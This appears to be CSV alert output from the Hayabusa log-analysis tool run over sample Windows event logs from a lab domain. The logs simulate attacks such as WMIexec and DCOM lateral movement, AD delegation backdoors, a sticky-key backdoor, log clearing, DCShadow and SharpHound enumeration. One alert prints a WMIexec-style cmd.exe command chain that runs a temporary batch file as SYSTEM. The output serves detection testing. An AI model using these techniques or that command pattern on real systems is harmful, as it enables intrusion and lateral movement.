2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx"
2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx"
2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx
2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx
2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
